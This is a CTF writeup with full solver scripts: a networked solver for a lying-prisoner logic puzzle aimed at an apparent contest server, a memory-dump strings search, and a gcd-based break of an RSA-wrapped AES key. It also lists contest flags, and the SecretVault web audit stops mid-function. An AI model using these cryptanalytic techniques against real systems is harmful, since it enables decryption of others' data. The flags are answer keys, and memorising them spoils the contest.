[CTF | Competitions] Qiangwang Cup Writeup
Table of Contents
- MISC
  - Sign-in
  - The_Interrogation_Room
  - Personal Vault
- crypto
  - check-little
- web
  - SecretVault
  - bbjv
MISC
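Sign-in
Challenge description:
> cat readme.txt
1. Asking anyone outside your team for solution approaches or flags, or colluding with them in any form, is strictly prohibited; violations are treated as cheating.
2. All participants should keep the records produced while analyzing the challenges so they can be submitted if questions arise.
3. Generative AI may be used to assist with solving. If it is used, participants must keep the complete AI conversation records (including but not limited to exported conversations, images, and videos) and upload them to Baidu Netdisk. The link must be placed at the top of the submitted writeup. If no link is submitted or the link is dead, the corresponding challenge is treated as cheating.
4. Each team's writeup must include, for every solved challenge, a detailed analysis, step-by-step screenshots, all scripts used, and a screenshot of the final flag (showing the flag value, unblurred). Obviously wrong or missing reasoning, scripts with logic errors, or content identical to another team's is treated as cheating.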
> cat flag
flag{我已阅读参赛须知,并遵守比赛规则。}
flag{我已阅读参赛须知,并遵守比赛规则。}
The_Interrogation_Room
Challenge description:
Reminder:
- Complete all rounds to get the flag (or a gift).
- Any invalid token terminates the session.
- Spaces must be added on both sides of ‘(’ and ‘)’.
The attachment:
import os
import random
import string
from hashlib import sha256
import socketserver
import secrets

white_list = ['==','(',')','S0','S1','S2','S3','S4','S5','S6','S7','0','1','and','or']
TURNS = 25

def interrogate(expr, secrets):
    tokens = []
    i = 0
    while i < len(expr):
        if expr[i] in '()':
            tokens.append(expr[i])
            i += 1
        elif expr[i].isspace():
            i += 1
        elif expr[i] in '01':
            tokens.append(expr[i] == '1')
            i += 1
        else:
            start = i
            while i < len(expr) and (expr[i].isalnum() or expr[i] == '_' or expr[i] == '='):
                i += 1
            word = expr[start:i]
            if word in ['S0', 'S1', 'S2', 'S3', 'S4', 'S5', 'S6', 'S7']:
                idx = int(word[1])
                tokens.append(secrets[idx])
            elif word in ['True', 'true']:
                tokens.append(True)
            elif word in ['False', 'false']:
                tokens.append(False)
            elif word == 'and':
                tokens.append('and')
            elif word == 'or':
                tokens.append('or')
            elif word == 'not':
                tokens.append('not')
            elif word == '==':
                tokens.append('==')
            else:
                raise ValueError(f"Invalid token: {word}")

    def evaluate(tokens):
        precedence = {'==': 2, 'not': 3, 'and': 1, 'or': 0}
        output = []
        ops = []
        for token in tokens:
            if token in [True, False]:
                output.append(token)
            elif token == '(':
                ops.append(token)
            elif token == ')':
                while ops and ops[-1] != '(':
                    output.append(ops.pop())
                if ops and ops[-1] == '(':
                    ops.pop()
                else:
                    raise ValueError("Mismatched parentheses")
            elif token in ['==', 'not', 'and', 'or']:
                while (ops and ops[-1] != '(' and precedence.get(ops[-1], -1) >= precedence.get(token, -1)):
                    output.append(ops.pop())
                ops.append(token)
        while ops:
            if ops[-1] == '(':
                raise ValueError("Mismatched parentheses")
            output.append(ops.pop())
        stack = []
        for token in output:
            if token in [True, False]:
                stack.append(token)
            elif token == 'not':
                if len(stack) < 1:
                    raise ValueError("Invalid expression: not enough operands for 'not'")
                a = stack.pop()
                stack.append(not a)
            elif token == 'and':
                if len(stack) < 2:
                    raise ValueError("Invalid expression: not enough operands for 'and'")
                b = stack.pop()
                a = stack.pop()
                stack.append(a and b)
            elif token == 'or':
                if len(stack) < 2:
                    raise ValueError("Invalid expression: not enough operands for 'or'")
                b = stack.pop()
                a = stack.pop()
                stack.append(a or b)
            elif token == '==':
                if len(stack) < 2:
                    raise ValueError("Invalid expression: not enough operands for '=='")
                b = stack.pop()
                a = stack.pop()
                stack.append(a == b)
        if len(stack) != 1:
            raise ValueError(f"Invalid expression: expected 1 result, got {len(stack)}")
        return stack[0]

    return evaluate(tokens)

class Task(socketserver.BaseRequestHandler):
    def proof_of_work(self):
        random.seed(os.urandom(8))
        proof = ''.join([random.choice(string.ascii_letters + string.digits) for _ in range(20)])
        _hexdigest = sha256(proof.encode()).hexdigest()
        self.send(f"sha256(XXXX+{proof[4:]}) == {_hexdigest}".encode())
        self.send(b'Give me XXXX: ')
        x = self.recv().encode()
        if len(x) != 4 or sha256(x + proof[4:].encode()).hexdigest() != _hexdigest:
            self.send('wrong')
            return False
        return True

    def recv(self):
        sz = 16384
        try:
            r = sz
            res = ""
            while r > 0:
                res += self.request.recv(r).decode()
                if res.endswith("\n"):
                    r = 0
                else:
                    r = sz - len(res)
            res = res.strip()
        except:
            res = ""
        return res.strip()

    def send(self, msg, newline=True):
        if isinstance(msg, bytes):
            msg += b'\n'
        else:
            msg += '\n'
            msg = msg.encode()
        self.request.sendall(msg)

    def interrogate_prisoner(self, ans, secrets, expr):
        try:
            S0, S1, S2, S3, S4, S5, S6, S7 = secrets
            r = interrogate(expr, secrets)
        except Exception as e:
            self.send("The prisoner pretends not to understand your question.\n", e)
            exit(0)
        return ans(r)

    def do_round(self):
        truth = lambda r: not not r
        lie = lambda r: not r
        secrets = []
        for i in range(8):
            secrets.append((True, False)[random.random() > 0.5])
        self.send("Welcome to the interrogation room! Detective, you are interrogating a cunning prisoner who holds 8 critical secrets.\nSome of these secrets are true intelligence while others are carefully planted disinformation.\nThe prisoner has agreed to answer your questions, but be warned - he will lie exactly twice during this session.\n")
        prisoner_deception = 2
        responses = [truth] * (17 - prisoner_deception) + [lie] * prisoner_deception
        random.shuffle(responses)
        for i in range(17):
            self.send("Ask your question:")
            question = self.recv()
            for word in question.split(" "):
                if word not in white_list:
                    self.send("({}) The prisoner smirks: 'I refuse to answer that questionable phrasing!'".format(word))
                    exit(0)
            res = str(self.interrogate_prisoner(responses[i], secrets, question))
            self.send("Prisoner's response: {}!\n".format(res))
        self.send("Now reveal the true secrets (1 for true, 0 for false):")
        return secrets == list(map(int, self.recv().split(" ")))

    def handle(self):
        if not self.proof_of_work():
            return 0
        self.send("Notice: The prisoner is a trained operative and will lie exactly twice in the 17 answers he gives you! Can you still uncover the truth?")
        for i in range(TURNS):
            if i == 10:
                self.send(f'Here is a gift for you: {secrets.Gift()}')
            if not self.do_round():
                self.send("The prisoner laughs triumphantly. 'You fell for my deception! Now I walk free while you face disciplinary action.'\n")
                exit(0)
            else:
                self.send("The prisoner scowls as you expose his lies. 'Very well, ask your next round of questions then.'\n")
        self.send("The prisoner slumps in defeat: 'Alright, you win! I'll tell you everything.' He confesses all his secrets and reveals the hidden location of {}'\nAs he signs the confession, you notice a coded message hidden in his handwriting that leads you to the ultimate prize.".format(secrets.flag))

try:
    fork = socketserver.ForkingTCPServer
except:
    fork = socketserver.ThreadingTCPServer

class ForkingServer(fork, socketserver.TCPServer):
    pass

if __name__ == "__main__":
    HOST, PORT = '0.0.0.0', 9999
    server = ForkingServer((HOST, PORT), Task)
    server.allow_reuse_address = True
    server.serve_forever()
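The whitelist contains neither not nor an XOR operator, yet parity questions can still be asked, because ( ( a == b ) == 0 ) is true exactly when a and b differ. The following is a minimal sketch of that idea; the helper names xor_question and check are made up for illustration, and the check uses Python's own eval as a stand-in for the server's evaluator.

```python
import itertools

# Tokens the server accepts, copied from white_list in the attachment.
WHITE_LIST = ['==', '(', ')', 'S0', 'S1', 'S2', 'S3', 'S4', 'S5', 'S6', 'S7',
              '0', '1', 'and', 'or']


def xor_question(indices):
    """Build a whitelist-only expression equal to the XOR of the chosen secrets.

    Hypothetical helper, not part of the challenge source.
    """
    if not indices:
        return "0"
    expr = f"S{indices[0]}"
    for idx in indices[1:]:
        # (x == y) == 0 holds exactly when x and y differ, i.e. x XOR y.
        expr = f"( ( {expr} == S{idx} ) == 0 )"
    return expr


def check(indices):
    """Compare the expression with plain parity over all 256 assignments."""
    expr = xor_question(indices)
    # Every space-separated word must be on the whitelist, as the server requires.
    if not all(tok in WHITE_LIST for tok in expr.split(" ")):
        return False
    for bits in itertools.product([False, True], repeat=8):
        env = {f"S{i}": b for i, b in enumerate(bits)}
        expected = sum(bits[i] for i in indices) % 2 == 1
        if bool(eval(expr, {}, env)) != expected:
            return False
    return True


print(xor_question([0, 2, 5]))
print(check([0, 2, 5]))
```

Every token is separated by a single space, which also satisfies the reminder that spaces are required on both sides of each parenthesis.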
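Hand the source to an AI chat assistant and have it write a solver. The script encodes the 8 secrets as a 17-bit codeword, asks one XOR question per codeword bit, and decodes the 17 answers while tolerating up to two lies: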
#!/usr/bin/env python3
# coding: utf-8
"""
server11_fixed_adaptive.py
Combines: generator-matrix encoding + XOR questions + PoW + adaptive discriminators + non-blocking/timeout-robust reads and writes
Usage: edit HOST / PORT, then run
"""
import socket
import itertools
import hashlib
import re
import string
import time
import json

# ---------------- CONFIG ----------------
HOST = "47.93.215.3"  # <- change to the target IP
PORT = 30731  # <- change to the target port

CHARSET = string.ascii_letters + string.digits
POW_PREFIX_LEN = 4

SECRET_BITS = 8
CODEWORD_BITS = 17
MAX_ERRORS = 2
MAX_QUERIES = 17

SOCKET_TIMEOUT = 6.0  # socket read timeout (seconds), prevents blocking indefinitely
RECV_CHUNK = 4096

# ---------------- GENERATOR MATRIX ----------------
GEN_MATRIX = [
    [0,1,1,0,1,0,0,0,1,1,0,0,0,1,0,1,1],
    [1,0,1,1,0,1,0,0,0,1,1,0,0,0,1,0,1],
    [1,1,0,1,1,0,1,0,0,0,1,1,0,0,0,1,0],
    [0,1,1,0,1,1,0,1,0,0,0,1,1,0,0,0,1],
    [1,0,1,1,0,1,1,0,1,0,0,0,1,1,0,0,0],
    [0,1,0,1,1,0,1,1,0,1,0,0,0,1,1,0,0],
    [0,0,1,0,1,1,0,1,1,0,1,0,0,0,1,1,0],
    [0,0,0,1,0,1,1,0,1,1,0,1,0,0,0,1,1],
]

# ---------------- UTIL: encode / generate questions ----------------
def encode(secret_bits):
    return tuple(sum(secret_bits[i] * GEN_MATRIX[i][j] for i in range(SECRET_BITS)) % 2 for j in range(CODEWORD_BITS))

# build codeword table
CODEWORD_TABLE = {}
for bits in itertools.product([0,1], repeat=SECRET_BITS):
    cw = encode(bits)
    CODEWORD_TABLE[cw] = bits

# generate XOR-like expressions from columns
def make_xor_expr(indices):
    if not indices:
        return "0"
    if len(indices) == 1:
        return f"S{indices[0]}"
    expr = f"( ( S{indices[0]} == S{indices[1]} ) == 0 )"
    for idx in indices[2:]:
        expr = f"( ( {expr} == S{idx} ) == 0 )"
    return expr

TRANSPOSED = list(zip(*GEN_MATRIX))
ALL_QUESTIONS = [make_xor_expr([i for i,b in enumerate(col) if b]) for col in TRANSPOSED]

# ---------------- Precompute truth masks for ALL_QUESTIONS ----------------
# mask: 256-bit int where bit k is 1 if secret==k makes question True
def build_question_masks(questions):
    masks = []
    for q in questions:
        mask = 0
        # evaluate q by evaluating XOR parity of active indices (convert expression -> active indices)
        # We can extract active indices more directly: find all S# occurrences
        idxs = sorted({int(x[1:]) for x in re.findall(r"S\d+", q)})
        # for all secrets:
        for k in range(256):
            s = [(k >> i) & 1 for i in range(SECRET_BITS)]
            # compute parity of selected indices (since our question is XOR combination)
            if not idxs:
                val = 0
            elif len(idxs) == 1:
                val = s[idxs[0]]
            else:
                # compute XOR of the listed indices
                xor = 0
                for ii in idxs:
                    xor ^= s[ii]
                val = xor
            if val:
                mask |= (1 << k)
        masks.append((q, mask, tuple(idxs)))
    return masks

QUESTION_MASKS = build_question_masks(ALL_QUESTIONS)

# ---------------- choose discriminators (bitset greedy) ----------------
def choose_discriminators_bitset(candidates_bits, question_masks, k=MAX_QUERIES):
    """
    candidates_bits: int bitset of candidate secret indices (bits 0..255)
    question_masks: list of tuples (q, mask, idxs)
    return: list of question strings
    """
    total = candidates_bits.bit_count()
    if total <= 1:
        return []
    remaining = question_masks.copy()
    selected = []
    while len(selected) < k and remaining:
        best_idx = None
        best_score = None
        for i, (q, mask, idxs) in enumerate(remaining):
            true_count = (candidates_bits & mask).bit_count()
            false_count = total - true_count
            score = max(true_count, false_count)  # minimize this
            # tie-break: prefer closer to balanced (abs difference smaller)
            diff = abs(true_count - false_count)
            if best_score is None or (score < best_score[0] or (score == best_score[0] and diff < best_score[1])):
                best_score = (score, diff)
                best_idx = i
        if best_idx is None:
            break
        selected.append(remaining.pop(best_idx))
        # if perfectly separated to singletons, stop (quick check)
        # Build patterns for selected
        patterns = {}
        for k2 in range(256):
            if ((candidates_bits >> k2) & 1) == 0:
                continue
            pat = 0
            for j, (_, m, _) in enumerate(selected):
                if ((m >> k2) & 1):
                    pat |= (1 << j)
            patterns.setdefault(pat, []).append(k2)
        if len(patterns) == total:
            break
        # if no split happened in this step, break
        if best_score[0] == total:
            break
    return [q for q, _, _ in selected]

# ---------------- decode with up to MAX_ERRORS corrections ----------------
def decode_candidates_from_answers(answers, questions):
    """
    answers: list of 0/1 for questions (len can be <= CODEWORD_BITS)
    questions: list of question strings in same order as answers
    Return: list of candidate secrets (tuples)
    """
    # Build masks for asked questions (reuse precomputed)
    qmask_map = {q: m for q, m, idxs in QUESTION_MASKS}
    q_masks = []
    for q in questions:
        if q not in qmask_map:
            # fallback (shouldn't happen)
            idxs = sorted({int(x[1:]) for x in re.findall(r"S\d+", q)})
            mask = 0
            for k in range(256):
                s = [(k >> i) & 1 for i in range(SECRET_BITS)]
                if not idxs:
                    val = 0
                elif len(idxs) == 1:
                    val = s[idxs[0]]
                else:
                    xor = 0
                    for ii in idxs:
                        xor ^= s[ii]
                    val = xor
                if val:
                    mask |= (1 << k)
            qmask_map[q] = mask
        q_masks.append(qmask_map[q])
    candidates = []
    # brute-force check all 256 secrets but using early prune when mismatches > MAX_ERRORS
    for k in range(256):
        mismatches = 0
        for m, a in zip(q_masks, answers):
            expected = ((m >> k) & 1)
            if expected != a:
                mismatches += 1
                if mismatches > MAX_ERRORS:
                    break
        if mismatches <= MAX_ERRORS:
            candidates.append((k, mismatches, tuple((k >> i) & 1 for i in range(SECRET_BITS))))
    candidates.sort(key=lambda x: x[1])
    return candidates

# ---------------- networking helpers (robust read) ----------------
def recv_until_any(conn, markers, timeout=SOCKET_TIMEOUT):
    """
    read from conn until any marker substring appears in the accumulated buffer or timeout occurs.
    returns (buffer_str, matched_marker_or_None)
    """
    conn.settimeout(timeout)
    buf = b""
    deadline = time.time() + timeout
    try:
        while time.time() < deadline:
            try:
                data = conn.recv(RECV_CHUNK)
            except socket.timeout:
                break
            if not data:
                break
            buf += data
            s = buf.decode(errors='ignore')
            for mk in markers:
                if mk in s:
                    return s, mk
        return buf.decode(errors='ignore'), None
    finally:
        conn.settimeout(None)

def read_line(conn, timeout=SOCKET_TIMEOUT):
    conn.settimeout(timeout)
    buf = b""
    try:
        while True:
            ch = conn.recv(1)
            if not ch:
                raise ConnectionAbortedError("remote closed")
            buf += ch
            if buf.endswith(b"\n"):
                break
        return buf.decode(errors='ignore').strip()
    except socket.timeout:
        raise TimeoutError("read_line timeout")
    finally:
        conn.settimeout(None)

def send_line(conn, s):
    conn.sendall((s + "\n").encode())

# ---------------- PoW solver (simple) ----------------
def solve_pow_from_intro(intro_line):
    m = re.search(r"sha256\(XXXX\+([A-Za-z0-9]+)\) == ([0-9a-f]{64})", intro_line.strip())
    if not m:
        return None
    suffix, target = m.groups()
    print(f"[*] Solving PoW sha256(XXXX+{suffix}) == {target[:12]}...")
    # single-thread brute force (fast enough usually). If you want, can replace with multiprocessing.
    for p in itertools.product(CHARSET, repeat=POW_PREFIX_LEN):
        pre = "".join(p)
        if hashlib.sha256((pre + suffix).encode()).hexdigest() == target:
            print(f"[+] PoW solved: {pre}")
            return pre
    return None

# ---------------- MAIN RUN ----------------
def run():
    print(f"[*] Connect to {HOST}:{PORT}")
    with socket.create_connection((HOST, PORT), timeout=10) as conn:
        conn.settimeout(None)
        # read initial lines until PoW or Ask
        intro, mk = recv_until_any(conn, ["sha256(", "Ask your question:", "Give me XXXX:", "Prisoner's response:"], timeout=8)
        print("[RECV-INTRO]")
        print(intro.strip().splitlines()[-10:])  # print last few lines
        # handle PoW
        if "sha256(" in intro:
            # extract the pow line (first occurrence)
            m = re.search(r'.*(sha256\(XXXX\+[A-Za-z0-9]+\) == [0-9a-f]{64}).*', intro, re.S)
            pow_line = m.group(1) if m else None
            if pow_line:
                pow_prefix = solve_pow_from_intro(pow_line)
                if pow_prefix is None:
                    print("[!] PoW unsolved, abort")
                    return
                # consume until "Give me XXXX:" prompt
                _, mk2 = recv_until_any(conn, ["Give me XXXX:"], timeout=4)
                send_line(conn, pow_prefix)
            else:
                print("[!] PoW line not parsed properly")
                return
        carry_candidates = None
        turn = 0
        # main loop: keep running rounds until flag found or connection closed
        while True:
            turn += 1
            print(f"\n=== TURN {turn} ===")
            # Wait for either "Ask your question:" or other control text
            buf, mk = recv_until_any(conn, ["Ask your question:", "Very well, ask your next round", "flag", "You fell for", "Now reveal the true secrets"], timeout=12)
            if "flag" in buf.lower():
                print("[+] Server returned flag or flag-containing text:")
                print(buf)
                return
            # choose questions for this round
            if carry_candidates is None:
                # use default full question set (first CODEWORD_BITS)
                questions = [q for q in ALL_QUESTIONS][:MAX_QUERIES]
                print(f"[*] Using base questions (count={len(questions)})")
            else:
                # build bitset of candidate indices
                bits_set = 0
                for k, mm, s in carry_candidates:
                    bits_set |= (1 << k)
                discrims = choose_discriminators_bitset(bits_set, QUESTION_MASKS, k=MAX_QUERIES)
                questions = discrims[:MAX_QUERIES]
                # pad with base if too few
                for q in ALL_QUESTIONS:
                    if len(questions) >= MAX_QUERIES:
                        break
                    if q not in questions:
                        questions.append(q)
                print(f"[*] Using adaptive questions (count={len(questions)})")
            # send questions in sequence, parse prisoner responses
            answers = []
            for qidx, q in enumerate(questions, start=1):
                # wait until server asks us to ask
                try:
                    s, mk = recv_until_any(conn, ["Ask your question:", "Now reveal", "Very well, ask your next round"], timeout=10)
                except Exception:
                    s, mk = "", None
                # If server says "Now reveal" or "Very well" before asking, break (proceed to reveal stage)
                if "Now reveal" in s or "Very well, ask your next round" in s:
                    # stop asking further questions this round
                    print("[*] Server moved to reveal/next state before all questions")
                    break
                # send question
                print(f"[SEND-Q {qidx}/{len(questions)}] {q}")
                send_line(conn, q)
                # read prisoner response
                resp_buf, mk2 = recv_until_any(conn, ["Prisoner's response:", "Prisoner returned", "Prisoner's response"], timeout=8)
                # parse boolean from resp_buf
                m = re.search(r"(True|False|true|false|1|0)", resp_buf)
                if not m:
                    # fallback: try a single read_line
                    try:
                        line = read_line(conn, timeout=3)
                        resp_buf += "\n" + line
                    except TimeoutError:
                        pass
                    m = re.search(r"(True|False|true|false|1|0)", resp_buf)
                if not m:
                    val = 0
                else:
                    token = m.group(1).lower()
                    val = 1 if token in ("true", "1") else 0
                answers.append(val)
                print(f"[RECV] answer -> {val}")
                # small sleep to be polite and avoid racing
                time.sleep(0.05)
            # If we have no answers (server advanced), try to read the line telling us next round
            if not answers:
                tail, mk3 = recv_until_any(conn, ["Very well, ask your next round", "Now reveal the true secrets", "flag", "You fell for"], timeout=6)
                if "flag" in tail.lower():
                    print("[+] Got flag text:")
                    print(tail)
                    return
                print("[*] No answers collected this iteration, continuing")
                carry_candidates = None
                continue
            # Now attempt to decode candidates from answers & list of questions asked
            candidates = decode_candidates_from_answers(answers, questions)
            print(f"[+] Decoded candidates count: {len(candidates)} (showing up to 8):")
            for i, (k, mm, s) in enumerate(candidates[:8]):
                print(f" cand{i}: idx={k:03d} mismatches={mm} secret={' '.join(str(x) for x in s)}")
            # If exactly 1 candidate -> reveal it
            if len(candidates) == 1:
                k, mm, secret_tuple = candidates[0]
                secret_str = " ".join(str(x) for x in secret_tuple)
                # Wait for "Now reveal" prompt (but be robust: if not present, just send)
                # Try to read a short message to see if server expects reveal
                tail, mk4 = recv_until_any(conn, ["Now reveal", "Give me the secrets", "Very well, ask your next round", "flag"], timeout=4)
                print(f"[*] Submitting secret: {secret_str}")
                send_line(conn, secret_str)
                # read immediate result lines
                result_buf, mk5 = recv_until_any(conn, ["fell for my deception", "Very well, ask your next round", "flag", "You fell for"], timeout=6)
                print("[RECV after submit]")
                print(result_buf.strip().splitlines()[-6:])
                if "flag" in result_buf.lower():
                    print("[+] Flag found in server response!")
                    return
                # if submission failed or server asks next round, continue
                carry_candidates = None
                # short delay before next round
                time.sleep(0.1)
                continue
            # no candidates -> fail (shouldn't often happen)
            if len(candidates) == 0:
                print("[!] No candidates found: saving answers for debug and aborting.")
                with open("debug_answers.json", "w") as f:
                    json.dump({"turn": turn, "questions": questions, "answers": answers}, f, indent=2)
                return
            # multiple candidates -> set carry and loop to next turn (adaptive stage)
            carry_candidates = candidates
            # save candidate file
            with open(f"candidates_turn_{turn}.txt", "w") as f:
                for k, mm, s in candidates:
                    f.write(f"{k:03d} {mm} {' '.join(str(x) for x in s)}\n")
            print(f"[*] Multiple candidates ({len(candidates)}). Saved candidates_turn_{turn}.txt and will disambiguate next round.")

# ---------------- run main ----------------
if __name__ == "__main__":
    try:
        run()
    except KeyboardInterrupt:
        print("\n[!] Interrupted by user")
flag{296ae6f1-5542-4f84-b0e8-6ac8898d7670}
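Why 17 questions are enough to survive two lies can be checked offline. The sketch below reuses the generator matrix from the solver and brute-forces all 256 codewords: if every nonzero codeword has weight at least 5, any two codewords differ in at least 5 positions, so flipping two answers can never make another secret fit within two mismatches. The function names min_distance, decode and simulate are illustrative, not taken from the script.

```python
import itertools
import random

# Generator matrix copied from the solver script above.
GEN_MATRIX = [
    [0,1,1,0,1,0,0,0,1,1,0,0,0,1,0,1,1],
    [1,0,1,1,0,1,0,0,0,1,1,0,0,0,1,0,1],
    [1,1,0,1,1,0,1,0,0,0,1,1,0,0,0,1,0],
    [0,1,1,0,1,1,0,1,0,0,0,1,1,0,0,0,1],
    [1,0,1,1,0,1,1,0,1,0,0,0,1,1,0,0,0],
    [0,1,0,1,1,0,1,1,0,1,0,0,0,1,1,0,0],
    [0,0,1,0,1,1,0,1,1,0,1,0,0,0,1,1,0],
    [0,0,0,1,0,1,1,0,1,1,0,1,0,0,0,1,1],
]


def encode(bits):
    """Multiply the 8 secret bits by the generator matrix over GF(2)."""
    return tuple(sum(b * row[j] for b, row in zip(bits, GEN_MATRIX)) % 2
                 for j in range(17))


CODEWORDS = {bits: encode(bits) for bits in itertools.product((0, 1), repeat=8)}


def min_distance():
    """For a linear code, the minimum distance is the minimum nonzero codeword weight."""
    return min(sum(cw) for bits, cw in CODEWORDS.items() if any(bits))


def decode(answers, max_lies=2):
    """Return every secret whose codeword is within max_lies of the answers."""
    return [bits for bits, cw in CODEWORDS.items()
            if sum(a != c for a, c in zip(answers, cw)) <= max_lies]


def simulate(rng):
    """Pick a random secret, flip exactly two answers, and decode."""
    secret = tuple(rng.randint(0, 1) for _ in range(8))
    answers = list(CODEWORDS[secret])
    for pos in rng.sample(range(17), 2):
        answers[pos] ^= 1
    return secret, decode(answers)


print("minimum distance:", min_distance())
secret, candidates = simulate(random.Random(0))
print(secret, candidates)
```

With a unique candidate every round, the adaptive branch of the solver should only be a fallback.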
Personal Vault
Challenge description:
My friend created a vault for each process, unfortunately we haven’t contacted for years, and this vault thing crashed my pc when I tried checking other’s secret? Please help me with this
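This is a memory forensics challenge; scanning the dump with strings turns up the flag. The -e l option selects 16-bit little-endian characters, which is how Windows stores wide strings: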
strings -e l MEMORY.DMP | grep flag{
flag{personal_vault_seems_a_little_volatile_innit}
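When strings is not available, the same search can be approximated in a few lines. This is a rough sketch that assumes the flag is printable ASCII stored as UTF-16LE; the function name find_utf16le_flags and the sample bytes are invented for illustration, and a multi-gigabyte dump would need chunked reading rather than loading everything at once.

```python
import re

# "flag{" as UTF-16LE, then printable ASCII characters (each followed by a NUL
# byte), up to the first closing brace.
FLAG_RE = re.compile(
    rb"f\x00l\x00a\x00g\x00\{\x00(?:[\x20-\x7e]\x00)*?\}\x00"
)


def find_utf16le_flags(data):
    """Return all flag{...} strings stored as UTF-16LE inside a bytes blob."""
    return [m.group(0).decode("utf-16-le") for m in FLAG_RE.finditer(data)]


# Made-up sample standing in for a slice of MEMORY.DMP.
sample = b"\x01\x02\x03" + "flag{demo_value}".encode("utf-16-le") + b"\xff\xfejunk"
print(find_utf16le_flags(sample))
```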
crypto
check-little
Challenge description:
e seems small; could that be relevant?
Challenge attachment:
# task.py
from Crypto.Util.number import *
from Crypto.Util.Padding import pad
from Crypto.Cipher import AES
import os

flag, key = open('secret').read().split('\n')

e = 3

while 1:
    p = getPrime(1024)
    q = getPrime(1024)
    phi = (p - 1) * (q - 1)
    if phi % e != 0:
        break
N = p * q
c = pow(key, e, N)

iv = os.urandom(16)
ciphertext = AES.new(key = long_to_bytes(key)[:16], iv = iv, mode = AES.MODE_CBC).encrypt(pad(flag.encode(),16)).hex()

f = open('output.txt', 'w')
f.write(f'N = {N}\n')
f.write(f'c = {c}\n')
f.write(f'iv = {iv}\n')
f.write(f'ciphertext = {ciphertext}\n')
# output.txt
N = 18795243691459931102679430418438577487182868999316355192329142792373332586982081116157618183340526639820832594356060100434223256500692328397325525717520080923556460823312550686675855168462443732972471029248411895298194999914208659844399140111591879226279321744653193556611846787451047972910648795242491084639500678558330667893360111323258122486680221135246164012614985963764584815966847653119900209852482555918436454431153882157632072409074334094233788430465032930223125694295658614266389920401471772802803071627375280742728932143483927710162457745102593163282789292008750587642545379046283071314559771249725541879213
c = 10533300439600777643268954021939765793377776034841545127500272060105769355397400380934565940944293911825384343828681859639313880125620499839918040578655561456321389174383085564588456624238888480505180939435564595727140532113029361282409382333574306251485795629774577583957179093609859781367901165327940565735323086825447814974110726030148323680609961403138324646232852291416574755593047121480956947869087939071823527722768175903469966103381291413103667682997447846635505884329254225027757330301667560501132286709888787328511645949099996122044170859558132933579900575094757359623257652088436229324185557055090878651740
iv = b'\x91\x16\x04\xb9\xf0RJ\xdd\xf7}\x8cW\xe7n\x81\x8d'
ciphertext = bf87027bc63e69d3096365703a6d47b559e0364b1605092b6473ecde6babeff2
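Hand it to the AI chat assistant, which solves it directly. The small e is a distraction: the key turns out to share the factor p with N (as the flag later hints), so gcd(N, c) recovers p and the rest is ordinary RSA decryption: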
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import math

# Values copied from the challenge's output.txt
N = int("18795243691459931102679430418438577487182868999316355192329142792373332586982081116157618183340526639820832594356060100434223256500692328397325525717520080923556460823312550686675855168462443732972471029248411895298194999914208659844399140111591879226279321744653193556611846787451047972910648795242491084639500678558330667893360111323258122486680221135246164012614985963764584815966847653119900209852482555918436454431153882157632072409074334094233788430465032930223125694295658614266389920401471772802803071627375280742728932143483927710162457745102593163282789292008750587642545379046283071314559771249725541879213")
c = int("10533300439600777643268954021939765793377776034841545127500272060105769355397400380934565940944293911825384343828681859639313880125620499839918040578655561456321389174383085564588456624238888480505180939435564595727140532113029361282409382333574306251485795629774577583957179093609859781367901165327940565735323086825447814974110726030148323680609961403138324646232852291416574755593047121480956947869087939071823527722768175903469966103381291413103667682997447846635505884329254225027757330301667560501132286709888787328511645949099996122044170859558132933579900575094757359623257652088436229324185557055090878651740")
iv = b'\x91\x16\x04\xb9\xf0RJ\xdd\xf7}\x8cW\xe7n\x81\x8d'
ciphertext = bytes.fromhex("bf87027bc63e69d3096365703a6d47b559e0364b1605092b6473ecde6babeff2")
e = 3

# Factor N (via gcd)
p = math.gcd(N, c)
q = N // p
assert p * q == N

# Private exponent d
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)

# Recover key
key = pow(c, d, N)

# long_to_bytes(key)[:16]
key_bytes = key.to_bytes((key.bit_length() + 7) // 8, 'big')[:16]

# AES-CBC decrypt and strip the padding
cipher = AES.new(key_bytes, AES.MODE_CBC, iv=iv)
pt_padded = cipher.decrypt(ciphertext)
pt = unpad(pt_padded, 16)
print(pt.decode())
flag{m_m4y_6e_divIS1b1e_by_p?!}
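The gcd step is easiest to see on small numbers. The following toy example uses made-up parameters (not the challenge values): when the message is a multiple of p, the ciphertext is too, so gcd(N, c) hands back p and normal decryption follows.

```python
from math import gcd

# Toy parameters for illustration only: two small primes with phi % 3 != 0.
p, q, e = 65537, 257, 3
N = p * q
phi = (p - 1) * (q - 1)
assert phi % e != 0

m = 5 * p          # the "key": an accidental multiple of p, still smaller than N
c = pow(m, e, N)   # what the challenge would publish alongside N

# c is divisible by p but not by q, so the gcd is exactly p.
recovered_p = gcd(N, c)
recovered_q = N // recovered_p

# Standard RSA private exponent (three-argument pow with -1 needs Python 3.8+).
d = pow(e, -1, (recovered_p - 1) * (recovered_q - 1))
recovered_m = pow(c, d, N)

print(recovered_p, recovered_m == m)
```

Decryption still works even though m is not coprime to N, because N is a product of two distinct primes and the result is correct modulo each of them.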
web
SecretVault
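Challenge description:
Xiao Ming recently registered accounts on many online platforms. To give each account a different strong password, he built his own very "secure" password storage system, SecretVault. But forgetful Xiao Ming cannot remember the master password. Can you help him find it?
First, audit the code. It is a Flask application: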
# app.py
import base64
import os
import secrets
import sys
from datetime import datetime
from functools import wraps
import requests

from cryptography.fernet import Fernet
from flask import (
    Flask,
    flash,
    g,
    jsonify,
    make_response,
    redirect,
    render_template,
    request,
    url_for,
)
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.exc import IntegrityError
import hashlib

db = SQLAlchemy()

class User(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(80), unique=True, nullable=False)
    password_hash = db.Column(db.String(128), nullable=False)
    salt = db.Column(db.String(64), nullable=False)
    created_at = db.Column(db.DateTime, default=datetime.utcnow, nullable=False)
    vault_entries = db.relationship('VaultEntry', backref='user', lazy=True, cascade='all, delete-orphan')

class VaultEntry(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
    label = db.Column(db.String(120), nullable=False)
    login = db.Column(db.String(120), nullable=False)
    password_encrypted = db.Column(db.Text, nullable=False)
    notes = db.Column(db.Text)
    created_at = db.Column(db.DateTime, default=datetime.utcnow, nullable=False)

def hash_password(password: str, salt: bytes) -> str:
    data = salt + password.encode('utf-8')
    for _ in range(50):
        data = hashlib.sha256(data).digest()
